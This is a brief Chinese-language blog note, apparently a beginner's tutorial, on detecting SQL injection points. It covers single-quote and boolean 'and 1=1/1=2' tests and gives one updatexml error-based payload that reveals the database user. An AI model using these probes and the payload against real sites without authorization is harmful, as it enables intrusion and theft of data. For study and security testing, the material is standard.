SQL注入

寻找注入点

可能存在SQL注入漏洞的URL类似形式:

http://xxx.xxx.xxx/abcd.php?id=XX

单引号判断法——在参数后面加上单引号

  • 如果页面返回错误,则存在SQL注入

数字型判断——and 1=1and 1=2

  1. 在URL地址后加 and 1=1 ,页面依旧正常,进行下一步;
  2. 在URL地址后加 and 1=2 ,页面运行错误,存在数字型注入。

字符型判断—— ' and '1'='1 ' and '1'='2

  1. 在URL地址后加 ' and '1'='1 ,页面依旧正常,进行下一步;
  2. 在URL地址后加 ' and '1'='2 ,页面运行错误,存在字符型注入。

报错注入

1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+-

持续更新...

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/augustine0654/p/15270385.html